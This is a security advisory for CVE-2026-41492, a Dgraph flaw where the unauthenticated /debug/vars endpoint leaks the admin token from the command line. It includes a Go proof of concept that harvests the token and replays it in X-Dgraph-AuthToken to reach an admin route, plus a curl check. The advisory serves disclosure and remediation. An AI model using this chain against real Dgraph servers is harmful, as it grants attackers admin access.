CVE-2026-41492
Published:April 24, 2026
Updated:April 26, 2026
Dgraph is an open source distributed GraphQL database. Prior to 25.3.3, Dgraph exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can read that token from the cmdline field of the expvar output and replay it in the X-Dgraph-AuthToken header to reach admin-only endpoints. This is a variant of the previously fixed /debug/pprof/cmdline issue; that fix is incomplete because it blocks only /debug/pprof/cmdline while Alpha still serves http.DefaultServeMux, on which expvar registers its /debug/vars handler. This vulnerability is fixed in 25.3.3 (and in 24.1.8 for the 24.1 release line, per the affected-package ranges below).
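The leak and the replay, as an added example in Go that is not Dgraph's own code: importing expvar registers /debug/vars on http.DefaultServeMux, so any server that hands the default mux to the HTTP listener publishes os.Args to whoever can reach the port. The block builds a stand-in admin endpoint on the default mux (the pre-fix layout) and on a dedicated mux (the hardened layout), simulates an Alpha argv carrying --security "token=...", harvests the token from the cmdline field of /debug/vars, and replays it in X-Dgraph-AuthToken. The /admin route, requireToken, the constructed argv and the token value are assumptions for the demo, not Dgraph identifiers.

```go
package main

import (
	"encoding/json"
	"expvar" // importing expvar registers its /debug/vars handler on http.DefaultServeMux at init
	"fmt"
	"net/http"
	"net/http/httptest"
	"os"
	"strings"
)

const authHeader = "X-Dgraph-AuthToken"

// adminToken stands in for the token an Alpha is started with via --security "token=...".
var adminToken string

// requireToken gates a handler on X-Dgraph-AuthToken matching the configured admin token.
func requireToken(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if adminToken == "" || r.Header.Get(authHeader) != adminToken {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// adminOnly is a constructed stand-in for an admin-only endpoint (hypothetical route /admin).
var adminOnly = requireToken(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintln(w, "admin ok")
}))

func init() {
	// Pre-fix layout: the admin route lives on http.DefaultServeMux, which also
	// carries expvar's /debug/vars (and net/http/pprof's routes when that is imported).
	http.Handle("/admin", adminOnly)
}

// hardenedMux serves a dedicated ServeMux so nothing registered on the default mux
// is reachable. Where expvar is still wanted, it sits behind the same token check.
func hardenedMux() *http.ServeMux {
	mux := http.NewServeMux()
	mux.Handle("/admin", adminOnly)
	mux.Handle("/debug/vars", requireToken(expvar.Handler()))
	return mux
}

// tokenFromCmdline is the attacker's parse of the cmdline array: find --security
// (as "--security value" or "--security=value") and pull token= out of its
// semicolon-separated key=value list.
func tokenFromCmdline(args []string) (string, bool) {
	for i, a := range args {
		var val string
		switch {
		case a == "--security" && i+1 < len(args):
			val = args[i+1]
		case strings.HasPrefix(a, "--security="):
			val = strings.TrimPrefix(a, "--security=")
		default:
			continue
		}
		for _, kv := range strings.Split(val, ";") {
			if k, v, ok := strings.Cut(strings.TrimSpace(kv), "="); ok && k == "token" && v != "" {
				return v, true
			}
		}
	}
	return "", false
}

// leakedToken fetches /debug/vars without credentials and extracts the token from cmdline.
func leakedToken(baseURL string) (string, bool) {
	resp, err := http.Get(baseURL + "/debug/vars")
	if err != nil {
		return "", false
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return "", false
	}
	var vars struct {
		Cmdline []string `json:"cmdline"`
	}
	if json.NewDecoder(resp.Body).Decode(&vars) != nil {
		return "", false
	}
	return tokenFromCmdline(vars.Cmdline)
}

// attack runs the chain against a handler: harvest the token, replay it in
// X-Dgraph-AuthToken against /admin, return the status obtained (0 if nothing leaked).
func attack(h http.Handler) int {
	srv := httptest.NewServer(h)
	defer srv.Close()
	tok, ok := leakedToken(srv.URL)
	if !ok {
		return 0
	}
	req, _ := http.NewRequest(http.MethodGet, srv.URL+"/admin", nil)
	req.Header.Set(authHeader, tok)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return 0
	}
	resp.Body.Close()
	return resp.StatusCode
}

// demo simulates an Alpha started with --security "token=..." (constructed argv): expvar's
// cmdline variable returns os.Args on every request, so this is exactly what /debug/vars serves.
func demo(token string) (vulnerable, hardened int) {
	adminToken = token
	os.Args = []string{"dgraph", "alpha", "--security", "token=" + token + "; whitelist=10.0.0.0/8"}
	return attack(http.DefaultServeMux), attack(hardenedMux())
}

func main() {
	v, h := demo("constructed-demo-token")
	fmt.Printf("default mux: attacker reached /admin with status %d\n", v)
	fmt.Printf("dedicated mux: attacker status %d (no token harvested)\n", h)
}
```

Against the default mux the attacker ends up with a 200 on the admin route; against the dedicated mux /debug/vars answers 401 and nothing is harvested. The same check from a shell is `curl -s http://<alpha>:8080/debug/vars | jq .cmdline` against a test instance (Alpha's HTTP port is 8080 by default): an Alpha that returns its argv unauthenticated is on an affected version, and rotating the token after upgrading is prudent because it may already have been read.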
Affected Packages
https://github.com/dgraph-io/dgraph.git (GITHUB):
  Affected version(s): >=v0.3 <v24.1.8
  Fix Suggestion: Update to version v24.1.8
https://github.com/dgraph-io/dgraph.git (GITHUB):
  Affected version(s): >=v25.3.0 <v25.3.3
  Fix Suggestion: Update to version v25.3.3
github.com/dgraph-io/dgraph (GO):
  Affected version(s): >=v0.3 <v25.3.3
  Fix Suggestion: Update to version v25.3.3
Related Resources (2)
CVSS v4
Base Score: 9.3
Attack Vector: NETWORK
Attack Complexity: LOW
Attack Requirements: NONE
Privileges Required: NONE
User Interaction: NONE
Vulnerable System Confidentiality: HIGH
Vulnerable System Integrity: HIGH
Vulnerable System Availability: HIGH
Subsequent System Confidentiality: NONE
Subsequent System Integrity: NONE
Subsequent System Availability: NONE
CVSS v3
Base Score: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality: HIGH
Integrity: HIGH
Availability: HIGH
Weakness Type (CWE)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor